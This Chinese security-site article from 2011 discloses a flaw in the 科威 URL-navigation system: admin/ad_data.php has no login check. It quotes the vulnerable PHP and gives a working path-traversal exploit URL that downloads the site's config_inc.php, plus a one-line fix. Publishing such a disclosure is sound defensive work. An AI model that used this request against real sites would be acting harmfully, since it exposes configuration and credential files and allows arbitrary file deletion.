频道栏目
首页 > 安全 > 网站安全 > 正文

科威网址导航系统任意下载、删除文件漏洞及修复

2011-01-04 10:42:22      个评论      
收藏   我要投稿

 
设计缺陷

漏洞文件: admin/ad_data.php
备份还原数据库功能,没有进行管理登录验证

看代码 ....
case down:
$filename or message(文件名不能为空);
file_down(../data/.$filename);
break;
case delete:
unlink("../data/{$_GET[filenames]}");
message("文件<strong>{$_GET[filenames]}</strong>删除成功");
break;

漏洞测试:EXP

http://127.0.0.1/admin/ad_data.php?action=down&filename=../include/config_inc.php

 

作者:心灵,由情整理编辑


修复:删除该页面,随用随传

上一篇:命令行下操作注册表劫持sethc提权
下一篇:美易CMS上传漏洞及修复(突破刚发布的补丁包)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站